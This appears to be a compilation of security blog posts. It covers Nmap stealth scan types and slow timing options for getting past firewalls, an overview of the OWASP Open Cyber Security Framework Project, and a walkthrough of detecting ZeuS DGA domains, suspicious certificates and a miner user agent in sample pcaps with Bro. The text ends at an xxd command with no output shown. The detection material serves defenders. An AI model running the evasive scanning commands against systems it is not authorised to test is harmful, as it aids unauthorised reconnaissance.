Null scan (-sN)

The Nmap Null scan (-sN) works by sending a TCP packet with no flag bits set. Per the TCP standard, a closed port should reply with a packet with the RST bit set to reset the connection, while an open port should not respond at all. Most firewalls will filter out these types of scans, but on occasion it can still yield results.

The format of the Null scan is:

 root@kali:~# nmap -sN -p $ports $hosts -oN output.txt



FIN scan (-sF)

A similar scan to the Null scan is the FIN scan, which sets just the FIN bit in a TCP packet. Like the Null scan, a closed port should respond with a packet with the RST bit set, while an open or filtered port should simply drop the packet.

The format of the FIN scan is:

 root@kali:~# nmap -sF -p $ports $hosts -oN output.txt



Window scan (-sW)

On certain older systems, a window scan can also be used to determine if a port is open or not. The window scan works by examining the TCP window field of the RST packets that come back: the port is considered open if the window value is positive and closed if it is zero. This scan isn't generally reliable, as most systems will simply report everything as closed, but as a last-resort scan type it may give some direction to investigate further. If a scan shows all ports as open but a few as filtered, the filtered ones may actually be open.

The format of the Window scan is:

 root@kali:~# nmap -sW -p $ports $hosts -oN output.txt



Timing (-T)

Another technique that can be used with Nmap is to scan very, very slowly using the -T parameter, which allows you to specify the frequency with which Nmap sends packets probing for open ports. Nmap has three settings that are slower than a normal scan, named paranoid, sneaky and polite. The main difference between these is the time Nmap waits between sending probes, with paranoid mode (-T0) waiting five minutes between each probe and polite mode (-T2) waiting 0.4 seconds.

Depending on the amount of hosts, ports and time available, different options will be suitable. Other parameters can also be passed to Nmap relating to how long Nmap should wait for a response, or how many times it should send a packet.

Scanning 100 for 100

If I was scanning 100 hosts and checking the top 100 ports, a command like the following would be useful:
 root@kali:~# nmap -sS -T1 --max-rtt-timeout 2000ms --max-retries 3 --host-timeout 10m --top-ports 100 -iL hosts.txt



The --max-retries option limits the number of retransmissions Nmap sends, the --max-rtt-timeout option ensures Nmap won't wait too long for a port to respond, and the --host-timeout option ensures Nmap won't waste time on hosts that are not responding at all. In the example above I set those options to a 2-second timeout for each port, 3 retransmissions, and no more than 10 minutes per host.

Against certain firewalls and/or older types of hardware, these options or some variation can often yield an accurate open ports list. In rare cases none of these techniques will work and a SYN/ACK will be sent for each port, showing every port as open. In such cases more extensive manual testing is required to investigate the actual response being sent and determine whether there is actually a service listening or not.

NmapAutoAnalyzer

The above techniques are primarily useful when you know a host is alive and need to retrieve an accurate list of open ports. What about in a situation where you are unsure if a host is alive or not because all ports are coming back as filtered and ICMP traffic is blocked? In such cases a firewall or IPS will still generally grant “normal” access to actual open ports.

The above scan types are still useful for this purpose: if a port is genuinely open and listening, the scan will indicate as much, although it may be lost in the noise of other ports being falsely reported as open. To determine which hosts are actually alive, the port scan data can be processed to show any host with at least one open port, which would indicate the host is alive.

There is a script that is very useful for this purpose called Nmap Auto Analyzer, obtainable here. Nmap Auto Analyzer is a Ruby script that will sort through Nmap output files and report a list of open ports for each host.

The format to run Nmap Auto Analyzer is:

 root@kali:~# nmapautoanalyzer.rb -f nmapoutput.xml -r report
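
Note that the -f argument expects Nmap's XML output, so add -oX (or -oA) to your scans before feeding them to the script; for example (a sketch reusing the earlier scan options):

 root@kali:~# nmap -sS -T1 --top-ports 100 -iL hosts.txt -oX nmapoutput.xml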



The report generated by Nmap Auto Analyzer will show hosts as up if they have at least one open port, as well as why the port is considered open based on the TCP traffic, which can be useful when sorting through scans that include many hosts.

An Open Cyber Security Framework

By Mateo Martinez.

In this blog post we're going to present a brief overview of the Open Cyber Security Framework Project.

There are a number of frameworks already on the market, like the new NIST "Cybersecurity Framework" or ISACA's "Transforming Cybersecurity Using COBIT 5", as well as other paid or country-oriented frameworks. However, there is no single open framework that governments and organizations can adopt as a reference model to start or improve on cybersecurity matters, and this is a real market need. Many governments and organisations are working on their own cybersecurity frameworks, all starting from scratch. This open framework will be created with governments and organizations around the globe, producing a de facto model to be used as a reference both by those just getting started and by those improving or optimizing existing cybersecurity frameworks. The main web page of the project is www.ocsfp.org, and release 1 of the core framework is expected by the end of March 2014. The OWASP Open Cyber Security Framework Project's aim is to create a practical framework for cybersecurity.

Creating, implementing and managing a cybersecurity framework has become a need (or maybe a must) for many governments and organizations. The Open Cybersecurity Framework Project (OCSFP) is an open project dedicated to enabling organizations to conceive or improve a cybersecurity framework. All of the information in OCSFP is free and open to anyone. Everyone is invited to join and collaborate in order to improve the content, which will be available worldwide. It is licensed under the Creative Commons Attribution-ShareAlike 3.0 license, so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work; if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or a similar license. OCSFP has been an OWASP project since February 2014.

The main objective of the project is to provide a practical cybersecurity strategy with three practical phases, as shown in the following figure:



There's a team of active contributors working on the core framework, and there's a very interesting roadmap of releases for 2014. Below is the list of open documents that are under development and will be released during the year. There's an open mailing list to join for those interested in collaborating with OCSFP.

The OCSFP contributors are working hard on the first Framework Core release, but open frameworks for specific industries like Healthcare, Government, Aeronautics, Telcos and Critical Infrastructure are also under development. The first versions of all of them will be released during 2014.

Open Cybersecurity Frameworks
  • Open Cybersecurity Framework Core
  • Open Cybersecurity Framework Core Implementation Guidelines
  • Open Cybersecurity Framework for IPv6
  • Open Cybersecurity Framework for Governments
  • Open Cybersecurity Framework for Enterprises
  • Open Cybersecurity Framework for Critical Infrastructure
  • Open Cybersecurity Framework for Aeronautics
  • Open Cybersecurity Framework for Oil & Gas
  • Open Cybersecurity Framework for Healthcare
  • Open Cybersecurity Framework for Telcos
  • Open Cybersecurity Assessment
  • Open Cybersecurity Quick Self-Assessment
  • Open Cybersecurity Quick Reference Guide
  • Open Cybersecurity Free Tools
  • Open Cybersecurity Incident Response Management Framework
  • Open Cybersecurity Framework for Small Biz


For those who are just evaluating their current status on cybersecurity, there's a quick online assessment with some simple questions about current information security programs and implemented technologies. With the first release of the framework core, a complete assessment will be available online, with a table of recommendations for the first steps in developing a cybersecurity strategy, taking into account your current maturity level.

Some of the available questions in the current online draft are:
  • Do you have a Data Loss Prevention Process?
  • Do you have an Incident Response Program?
  • Do you have a Vulnerability Management Process?
  • Do you train your Response Teams in Malware Analysis and Forensics?
  • Do you have a NG Firewall installed?
  • Do you have a dedicated IDS or IPS?
  • Do you have a Data Loss Prevention Solution implemented?
  • Do you have a Web Proxy installed?
  • Do you have full disk encryption on your laptops?
  • Do you have a Host Firewall on your organization's computers?
  • Do you have Host IPS on your organisation's computers?
  • Do you have a vulnerability scanner?
  • Do you have any Log Management / SIEM solution?


When you go deeper into the framework you will notice that after the 3-phase strategy there is a set of activities to be implemented in the cybersecurity strategy:
  • Security Strategy Roadmap
  • Risk Management
  • Vulnerability Management
  • Security Controls
  • Arsenal
  • Incident Response Management
  • Data Loss Prevention
  • Education & Training
  • Business Continuity & Disaster Recovery
  • Application Security
  • Penetration Tests


Last but not least, the project has created a matrix mapping the controls of the SANS Top 20, the NIST Cybersecurity Framework and the Federal Communications Commission guidance to OCSFP, and some other well-known market frameworks are being mapped into OCSFP activities too:



The first release of the framework core is due at the end of next month and will be available worldwide, helping organisations and governments improve their security posture faster.

Identifying Malware Traffic with Bro and the Collective Intelligence Framework (CIF)

By Ismael Valenzuela.

In this post we will walk through some of the most effective techniques used to filter suspicious connections and investigate network data for traces of malware using Bro, some quick and dirty scripting, and other freely available tools like CIF.

This post doesn't pretend to be a comprehensive introduction to Bro (check the references section at the end of the post for that) but rather a quick reference with tips and hints on how to spot malware traffic using Bro logs and other open source tools and resources.

All the pcap files used throughout this post can be obtained from GitHub. Some of them have been obtained from the large dataset of pcaps available at contagiodump.

Finally, if you are new to Bro I suggest that you start by downloading the latest version of Security Onion, a must-have Linux distribution for packet ninjas. Since version 12.04.4, Security Onion comes with the new Bro 2.2 installed by default, so all you need to do is open the terminal, grab the samples and maybe some coffee... (There is never enough coffee!)

Traffic Analysis with Bro

We will start replaying our first sample through Bro with:
 $ bro -r sample1.pcap local



This command tells Bro to read and process sample1.pcap, pretty much like tcpdump or any other pcap tool does. By adding the keyword “local” at the end of the command, we ask Bro to load the ‘local’ script file, which in SecurityOnion is located in /opt/bro/share/bro/site/local.bro.

When the command is completed, Bro will generate a number of logs in the current working directory. These logs are highly structured, plain text ASCII and therefore Unix friendly, meaning that you can use your command line kung-fu with awk, grep, sort, uniq, head, tail and all the other usual suspects.

To see the summary of connections for sample1.pcap we can have a quick look at conn.log:

 $ cat conn.log





The figure above shows an excerpt of the output of this command. Notice how the output of Bro logs is structured in columns, each of them representing different fields. These fields are shown in the 7th line of the output header, starting with "ts" (timestamp in seconds since epoch) and "uid" (a unique identifier of the connection that is used to correlate information across Bro logs). Refer to the Bro documentation to learn more about the rest of the fields.

 #separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path conn
#open 2014-03-07-13-51-01
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p proto service duration orig_bytes resp_bytes conn_state local_orig missed_bytes history orig_pkts orig_ip_bytes resp_pkts resp_ip_bytes tunnel_parents
#types time string addr port addr port enum string interval count count string bool count string count count count count table[string]




We can observe a number of connections to port 80 (tcp) and port 53 (udp). Conn.log also reports the result of these connections under the conn_state field. Let's have a closer look at that using bro-cut, an awk-based field extractor for Bro logs.

 $ cat conn.log | bro-cut id.orig_h id.orig_p id.resp_h id.resp_p proto conn_state

172.16.88.10 49508 172.16.88.135 80 tcp REJ
172.16.88.10 49510 172.16.88.135 80 tcp REJ
172.16.88.10 57852 172.16.88.135 53 udp SF
172.16.88.10 49509 172.16.88.135 80 tcp REJ
172.16.88.10 57399 172.16.88.135 53 udp SF
172.16.88.10 49510 172.16.88.135 80 tcp REJ
172.16.88.10 57456 172.16.88.135 53 udp SF
172.16.88.10 49511 172.16.88.135 80 tcp S0
172.16.88.10 62602 172.16.88.135 53 udp SF
172.16.88.10 54957 172.16.88.135 53 udp SF
172.16.88.10 49511 172.16.88.135 80 tcp SH
172.16.88.10 49512 172.16.88.135 80 tcp S0
172.16.88.10 64623 172.16.88.135 53 udp SF
172.16.88.10 53702 172.16.88.135 53 udp SF
172.16.88.10 49512 172.16.88.135 80 tcp SH
172.16.88.10 49513 172.16.88.135 80 tcp S0
172.16.88.10 52164 172.16.88.135 53 udp SF
172.16.88.10 49513 172.16.88.135 80 tcp SH
172.16.88.10 49516 172.16.88.135 80 tcp S0
172.16.88.10 54832 172.16.88.135 53 udp SF
172.16.88.10 49516 172.16.88.135 80 tcp SH
172.16.88.10 49517 172.16.88.135 80 tcp S0
172.16.88.10 64102 172.16.88.135 53 udp SF
172.16.88.10 51110 172.16.88.135 53 udp SF
172.16.88.10 49517 172.16.88.135 80 tcp SH
172.16.88.10 49518 172.16.88.135 80 tcp S0
172.16.88.10 55957 172.16.88.135 53 udp SF
172.16.88.10 49519 172.16.88.135 80 tcp S0
172.16.88.10 58988 172.16.88.135 53 udp SF
172.16.88.10 49518 172.16.88.135 80 tcp SH



In this case, we can observe that some of the connections attempted on port 80 were rejected (REJ), while others never had a reply (S0) or left the connection half-open (SH, which means a SYN-ACK from the responder was never seen). The reason for this behavior is that sample1.pcap was obtained from one of my sandboxes where 172.16.88.135 is a Virtual Machine running Remnux with fakedns and netcat listening on port 80 instead of a full web server.

Since we know that there is some http traffic going on here, let’s have a look at another log generated by Bro: http.log

 $ cat http.log | bro-cut id.orig_h id.orig_p id.resp_h id.resp_p host uri referrer

172.16.88.10 49493 172.16.88.135 80 f52pwerp32iweqa57k37lwp22erl48g63m39n60ou.net / -
172.16.88.10 49495 172.16.88.135 80 h54jtbqmuj56hwb48e41p42g33h34c29grbqfxm29.ru / -
172.16.88.10 49511 172.16.88.135 80 iqcqmrn30iuoubuo11crfydvkylrbtmtev.info / -
172.16.88.10 49512 172.16.88.135 80 ezdsaqbulsgzh44m59p42eqmrkxa57n40brcq.com / -
172.16.88.10 49513 172.16.88.135 80 o41lwmqnqarmxiyi35iyftpzaye21osjyjq.ru / -
172.16.88.10 49516 172.16.88.135 80 n30arh24frisbslqmqoxgvpvk47o11pritev.biz / -
172.16.88.10 49517 172.16.88.135 80 jsa57n20hyisjxcre11fwl58gta37i65ovf32o51.info / -
172.16.88.10 49518 172.16.88.135 80 j36lxf52hsj56itc49lqayoveymwfzosi15jw.org / -
172.16.88.10 49519 172.16.88.135 80 g53lvo61ayoucrm49kzgvm69irhwl58erjwfu.net / -
...



Anything weird here? Definitely! The host field of the http.log shows entries that don’t seem to correspond with normal browsing.

A closer look at the dns.log produced by Bro will confirm this:

 $ cat dns.log | bro-cut query | sort -u

a37fwf32k17gsgylqb58oylzgvlsi35b58m19bt.com
a47d20ayd10nvkshqn50lrltgqcxb68n20gup62.com
a47dxn60c59pziulsozaxm59dqj26dynvfsnw.com
a67gwktaykulxczeueqf52mvcue61e11jrc59.com
axgql48mql28h34k67fvnylwo51csetj16gzcx.ru
ayp52m49msmwmthxoslwpxg43evg63esmreq.info
azg63j36dyhro61p32brgyo21k37fqh14d10k37fx.com
cvlslworouardudtcxato51hscupunua57.org
cyh44jud50g33iuarlzgqbup22fqisixf62kr.org
d10h34othyp62b18lyfwnzazj26p42fud50gzc49.biz
d20iwe51ftitg53lvl18a27hvlqjyjtd20gue61.com
dqhzhtbto21h14lvp12iqhtlrnxasarcte61.biz
drp42i25ati55m69pvgza57nyh34hwk57i55m19n60.ru
iqcqmrn30iuoubuo11crfydvkylrbtmtev.info
iqo11c69mud20krk57j16fqnrfwgva67oraql48.com
isjqn30a27hwgqbxnxksi65hrnsgyc49mylt.biz
iupqhxfwpylxm29jsexovj16cqfybwb68aw.org
iwpslvesj26i65oynxhtoyc39o41asdvnqc59.com
j36lxf52hsj56itc49lqayoveymwfzosi15jw.org
jshvprc29ntm69p52j36a17m39ozk67g53crfqow.net
jvbtore21fzm39fse51p32auizl28gxaul68px.com
k17g63l58jucvd30brhyovhsptd10lxd60gqfv.biz
k27ori65cve61kvc49hxptdrb48myo61fueves.org
k47isgzkxp62o51etmwazewmvpvgwbvmvfz.com
kqd60lvlsg63bsg33e11i55kvo41nrj36hzbthr.info
kvm49mynrd60l48lynre21hqfun20a47hyn20kq.org
kyoqpxg53nuf42g43oqo21l48a17d40o31k67j16h44.org
l18k17mzpum69jvlyp62c29hzeyi25kta47a37lv.ru
n50owhwguj66evkug33ewntn10n40puhtlxay.org
nrd30j46cxnwmyc69bscrcyiuhvf22otg43mq.com
nub58p52b38ismtg63mwlwm29evd20g13f52otb68.info
nxhyosg43a47exhum19g23f52fro21byayk57fs.info
o21mwm29gzouhvpub68g43dzntgzn30aultd30.net
o31j16n30eyiql58btmxe21euowb38pxf22b68ou.net
psgsgumukxb18b58dxd40e31f22g53a37bzmxcz.com
pxoxgzkqmqp12a47azjzpze11hteri35iti45.info
pyn30h64krm69bwf12azp52fulskvh24m19nrjy.org
(output truncated)





Looking at the length of the domains requested, we can observe a pattern. First of all we will cut out the TLDs (com, info, net...) and then calculate the length of each of the remaining strings.

 $ cat dns.log | bro-cut query | sort -u | cut -d . -f1 > domains-withoutTLD
$ for i in `cat domains-withoutTLD`; do echo "${#i}"; done | sort -u

34
35
36
37
38
39
40
41
42
43



So all these strings fall within a narrow range of 34 to 43 characters. Coincidence? Not really: a variant of the ZeuS botnet, the so-called ZeuS Gameover, is known for implementing P2P and Domain Generation Algorithm (DGA) communications to determine the current Command and Control (C&C) domain. When these bots can’t communicate with their botnet via P2P, DGA is used instead. The domain names generated by ZeuS Gameover consist of a string of 32 to 48 characters followed by one of the following TLDs: ru, com, biz, net or org. The list contains over 1000 domains and changes every 7 days, based on the current date.

A regular expression like this can be used to search for ZeuS domains:

 [a-z0-9]{32,48}\.(ru|com|biz|info|org|net)
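As a quick illustration, the Python sketch below applies that regular expression to the queries extracted from dns.log. It assumes the queries were saved one per line to queries.txt, for example with cat dns.log | bro-cut query > queries.txt.

import re

# ZeuS Gameover DGA pattern from the regular expression above
ZEUS_DGA = re.compile(r"^[a-z0-9]{32,48}\.(ru|com|biz|info|org|net)$")

# queries.txt is an assumed file holding one DNS query per line
with open("queries.txt") as f:
    for query in (line.strip().lower() for line in f):
        if query and ZEUS_DGA.match(query):
            print(query)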


ZeuS Gameover has been reported as one of the most active banking Trojans in 2013, along with Citadel, another well-known piece of malware that has targeted a large number of financial organizations with a focus on Europe and the Middle East.

Kleissner.org maintains a list of 1000 valid domains for ZeuS Gameover and updates it every week. A simple bash script can compare a list of domains obtained from dns.log to the list published by Kleissner.org:

 $ cat dns.log | bro-cut query | sort -u > domains

$ for i in `cat domains`; do grep $i ZeusGameover_Domains; done
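If the grep loop gets slow on large lists, a set intersection does the same comparison in a single pass. A minimal Python sketch, assuming both files hold one domain per line:

# domains: queries extracted from dns.log; ZeusGameover_Domains: the Kleissner.org feed
def load(path):
    with open(path) as f:
        return {line.strip().lower() for line in f if line.strip()}

for hit in sorted(load("domains") & load("ZeusGameover_Domains")):
    print(hit)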



SSL Traffic and Notice.log

Malware authors are making increased use of SSL traffic to mask communications with C&C servers, data exfiltration and other malicious actions. Since decrypting SSL communications is not feasible in most of the scenarios, malware analysts must employ other techniques to spot badness in encrypted sessions. TLS or SSL handshake failures, suspicious, invalid or weird certificates can be indicators of such badness in your network traffic and the good news is that Bro, by default, does some of that analysis already for you, suggesting potentially interesting network activity for you to investigate.

To demonstrate how Bro can help with finding those indicators, we’ll look at sample2.pcap

 $ bro -r sample2.pcap local


See that a notice.log file has been created in the working directory, along with http.log, ssl.log and others.

Let’s have a look at the contents of notice.log:

 $ cat notice.log | bro-cut msg sub

SSL certificate validation failed with (unable to get local issuer certificate) CN=www.tl6ou6ap7fjroh2o.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.vklxa6kz.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.5rthkzelyecfpir56.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.dctpbbpif6zy54mspih.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.getvdkk6ibned7k3krkc.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.hstk2emyai4yqa5.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.icab4ctxldy.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.bnbhckfytu.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.e6nbbzucq2zrhzqzf.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.cvapjjtbfd6yohbarw5q.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.zhbohcqeanv5hw.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.v6onqj4tmlmcchw23bl.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.gaqq6ld5gdgib.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.hlixz2cz43jepqwl.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.jn4k5f5wi65edy7emll.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.4geh5kzuywu3u.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.rshopmsscpfbw6p.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.c2rwawybhf.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.3gbl5nlxxs37ycdbhvcr.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.qhpomorewmsgxkg2d.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.wtytpviziqgpxsz.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.f5zhq25qq.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.3ktww4bg.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.c2nhdwaukm.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.iqm3bvunu.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.pts5agysxnvyyvbysfv.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.ygn472gapjnkkbplith.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.jaaok2kcxn.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.ktq2go444i.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.ferqncujta3wvl.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.2u5j3bw2r.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.uopxo7ik3i2nti.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.2ugfspjvd3tjaa.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.vjonqvyku.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.6canpulqbqdbqkxc6is.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.42ixw6g5fu44w7sth.net
SSL certificate validation failed with (unable to get local issuer certificate) CN=www.kqwm2iwsvh4xd2q.net
(output truncated)



Hmmm… that looks really suspicious again!

Let’s have a look at the contents of the ssl.log now:

 $ cat ssl.log | bro-cut server_name subject issuer_subject

www.seu4oxkf6.com CN=www.tl6ou6ap7fjroh2o.net CN=www.tbajutyf.com
www.fjpv.com CN=www.vklxa6kz.net CN=www.ohqnkijzzo5vt.com
www.pdpqsu.com CN=www.5rthkzelyecfpir56.net CN=www.qbboo7mcwzv7.com
www.vkojgy6imcvg.com CN=www.dctpbbpif6zy54mspih.net CN=www.m6hoayo5cga.com
www.dbyryztrr7sui3rskjvikes.com CN=www.getvdkk6ibned7k3krkc.net CN=www.7pz4gaio6uc25dyfor.com
www.xqwf7xs6nycmciil3t5e4fy5v.com CN=www.hstk2emyai4yqa5.net CN=www.wc62pgaaorhccubc.com
www.rix56ao4hxldum4zbyim.com CN=www.icab4ctxldy.net CN=www.wmylm3gln.com
www.uabjbwhkanlomodm5xst.com CN=www.bnbhckfytu.net CN=www.w4rlc25peis46haafa.com
www.dl2eypxu3.com CN=www.e6nbbzucq2zrhzqzf.net CN=www.cbj5ajz4qgeieshx32n.com
www.ebd7caljnsax.com CN=www.cvapjjtbfd6yohbarw5q.net CN=www.brbqn4rqhscp4rdq.com
www.qnqxclmrk2cqskkb732czjma.com CN=www.zhbohcqeanv5hw.net CN=www.w3rfg432.com
www.bxstw.com CN=www.v6onqj4tmlmcchw23bl.net CN=www.yc2xz27yoe76.com
www.b6lwb6v.com CN=www.gaqq6ld5gdgib.net CN=www.nu6u7osxzhmgx64.com
www.xf3225vc7drvcgborjll3.com CN=www.ryfg74xnxjg42ln3.net CN=www.y6bn3trq5cesxk.com
www.7dezfrpxuvmtr.com CN=www.svhbg7k2ed7ijcloj2.net CN=www.tfijljrmlqi.net
www.pcnia4i6e6w.com CN=www.yastvwre5fvpq3av.net CN=www.c6dmymzw.com
www.zvnbxtgu5dwe6lwc.com CN=www.u7c2brldvuk3xil.net CN=www.owgtwdiazfmzmwu6a5.com
www.ofbw37.com CN=www.qyccfgkjb.net CN=www.gs52pdnqyd.com
www.zr7kfc25mofcq.com CN=www.oi6z76t4.net CN=www.oe7gv5kxhix2i7eil.com
www.cmeh4agzyphi.com CN=www.jnqlvjcoou26znx.net CN=www.p4tgeg6dhp.com
www.k2u3bnbhxhpl.com CN=www.llhtnj3yyk.net CN=www.qotouwlbhjt.com
www.bneghg3axzl75sn7k2pdzor.com CN=www.shucgk26k4x5inet.net CN=www.j4n2j3sz57cf.com
www.ytedf3vqd4hxjo7rmhe6.com CN=www.noyxmydlc3ncgwv4t7hc.net CN=www.xem2wczmpqtypvzzpsex.com
www.by4seu7gjht7.com CN=www.wgrv4vpyx.net CN=www.eyvoebmi4ls6o6.com
www.cx7dg5bcn4cy.com CN=www.lipko2t5yqirjrqn2e.net CN=www.l4kvblp6bd.com
www.zn26rblhi.com CN=www.5nmv7zbdqdvgbfem6l.net CN=www.l3zkpiwawmpwjbzf.com
www.ecajni2stg3733w4jgi75.com CN=www.k3dbsxb423am5bwcb.net CN=www.uuwdimryu2gi42.com
www.x3os5xrkcr7a2rpmxre2.com CN=www.km6ptswm7mo.net CN=www.giovpc7o3.com
www.2c27bhbej.com CN=www.pymflkqpqdgghnfj.net CN=www.jocupasu2o6b2af2tn.com
www.4x4fp.com CN=www.icab4ctxldy.net CN=www.wmylm3gln.com
www.busdvimuibiundyob3e74js.com CN=www.xwwc4mvab66dnn.net CN=www.7hhuhzlztld46.com
www.zk2sv4vbwtanvh6x.com CN=www.bjxrmwnhp44enzypv6dc.net CN=www.b2ond2dxj.net
www.nijvbs5nuyn7zkemgi.com CN=www.wgwr7qn7v3j.net CN=www.u57w6yc5rvv.com
www.hamsnp.com CN=www.ge26nt2rx.net CN=www.aewmz33hq6rn7x7nud3.com
www.gsen3cievf3px7anzc6j.com CN=www.3zz5we62e.net CN=www.w7sb5mdv7w.com
www.3lwerxmlqmq2jsjioqgx5kkyc.com CN=www.ohfe52bk6gyfzojwgts.net CN=www.jhzi7jmhledqxg.com
www.2ipe23pugsiii.com CN=www.6hfs2womid.net CN=www.aq3w5zrobmejm.com
www.f3vzvxsedn.com CN=www.eelcaqcncssfzliilic.net CN=www.xshjb4uihtmpxh.com
www.hh62esff4qj5.com CN=www.mqhz74wxch4gj.net CN=www.wcmcdpazt7iw7g.com
www.juipuxm76hu6df6.com CN=www.5nmv7zbdqdvgbfem6l.net CN=www.l3zkpiwawmpwjbzf.com
www.6ll3wnw5dmg.com CN=www.suy5hv542.net CN=www.5mypgv7tgzypyaz63w.com
www.h5hgbrs75gl3c5uh5xnld3i.com CN=www.4x4j6xhtk5qh.net CN=www.rmybfv4mrpzlcicfg.net



Again, parsing these logs with bro-cut and other command line tools to generate a list of suspicious domains is straightforward. That list can be compared to a list of well-known malicious domains, or used with various domain reputation services. We will talk more about how to leverage threat intelligence feeds with Bro later in this post.
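For example, a small Python sketch along these lines could pull the CN values out of the subject and issuer fields and check them against a blacklist. The file names are assumptions, as is a bro-cut export such as cat ssl.log | bro-cut server_name subject issuer_subject > ssl-fields.txt.

# Extract every CN=... value from the exported ssl.log fields
def extract_cns(path="ssl-fields.txt"):
    cns = set()
    with open(path) as f:
        for line in f:
            for field in line.split():
                if field.startswith("CN="):
                    cns.add(field[3:].lower())
    return cns

# blacklist.txt is an assumed file of known-bad domains, one per line
with open("blacklist.txt") as f:
    bad = {line.strip().lower() for line in f if line.strip()}

for domain in sorted(extract_cns() & bad):
    print("known-bad certificate CN:", domain)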

Let’s carry on with our analysis. A closer look at the http.log reveals some potentially interesting User Agents under the user_agent field:

 $ cat http.log | bro-cut user_agent | sort -u

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

cgminer 2.7.5



Can you see that cgminer user agent? It is well known that malware can use unusual, weird or unique user agents in the headers of its HTTP requests. A good study on that was written by Robert Vandenbrink.

In this case the user agent indicates that we’re looking at a bot whose purpose is to deliver bitcoin mining traffic. For more information about this particular bot, check Liam Randall’s solutions and scripts on his GitHub.
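One simple way to surface unusual user agents is to count how often each one appears; the rare ones usually deserve a closer look. A quick sketch, assuming the user_agent column was exported to user-agents.txt with bro-cut:

from collections import Counter

# Count each distinct user agent; "-" marks requests where Bro saw no User-Agent header
with open("user-agents.txt") as f:
    counts = Counter(line.strip() for line in f if line.strip() and line.strip() != "-")

# Print the rarest user agents first
for ua, n in sorted(counts.items(), key=lambda kv: kv[1]):
    print(n, ua)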

The new file analysis framework

The file analysis framework is a new feature introduced with Bro 2.2 that provides plenty of new functionality to network analysts. One of its most powerful features is the ability to extract files from network streams based on multiple criteria: geospatial (e.g. per country of origin), signature based, destination based, etc.

Files can be extracted from various protocols including FTP, HTTP, SMTP and IRC. Others like BitTorrent and SMB will be added in the near future.

Thanks to the powerful Bro language, the new file analysis framework can be combined with actions to do awesome stuff like looking files up in a malware hash registry, uploading them to VirusTotal or a Cuckoo sandbox, or even tweeting the results of your analysis!

To demonstrate some of its capabilities we’ll analyze sample3.pcap. As usual we start replaying the capture with Bro:

 $ bro -r sample3.pcap local


You should have a new log: files.log. Let’s have a look at its contents:

 $ cat files.log | bro-cut fuid mime_type filename total_bytes md5

FC7cMq18xeqtT9IGD3 application/zip - 31044 0cbc25ade65bcd7a28dd8ac62ea20186



We have a single entry. We don’t have a filename, but Bro has recorded the MIME type and even computed the MD5 hash for us!

Can we extract that file? Of course we can! Open your text editor of choice and save these lines as extract-all.bro
 event file_new(f: fa_file)
{
    # Attach the extraction analyzer to every file Bro observes on the wire
    Files::add_analyzer(f, Files::ANALYZER_EXTRACT);
}



Congratulations! You’ve written your first Bro script. Next, run the capture against Bro again, this time replacing the ‘local’ script with the new one you just created. You might need to run this as root:

 $ bro -r sample3.pcap extract-all.bro


This command will create a new directory extract_files where all files extracted will be located:

 $ ls extract_files

extract-HTTP-FC7cMq18xeqtT9IGD3



Let’s confirm what kind of file we’re looking at:

 $ file extract-HTTP-FC7cMq18xeqtT9IGD3 

extract-HTTP-FC7cMq18xeqtT9IGD3: Zip archive data, at least v2.0 to extract

$ xxd extract-HTTP-FC7cMq18xeqtT9IGD3 | head -10

0000000: 504b 0304 1400 0808 0800 208f 1c41 0000 PK........ ..A..
0000010: 0000 0000 0000 0000 0000 0d00 0000 6234 ..............b4
0000020: 612f 6234 612e 636c 6173 73c5 7979 5c9b a/b4a.class.yy\.
0000030: 5b76 d8b9 9240 427c 8010 1606 db18 63fb [v...@B|......c.
0000040: 6110 606c 24b0 0783 0149 0801 daf7 0d09 a.`l$....I......
0000050: edfb 2eb4 22e4 7979 33c9 bc74 3259 babd ....".yy3..t2Y..
0000060: d725 93ce 6bac a493 f4bd e729 76e3 cc8c .%..k......)v...
0000070: d32d 69d2 25d3 769a a64d 9ba6 49da a4cd .-i.%.v..M..I...
0000080: d2c9 d2e9 b44d 9c73 0578 c36f dee4 af9a .....M.s.x.o....
0000090: 9fbe 7bbe 7bcf 3dfb 39f7 9ecf 3fff a73f ..{.{.=.9...?..?

$ xxd extract-HTTP-FC7cMq18xeqtT9IGD3 | tail -10

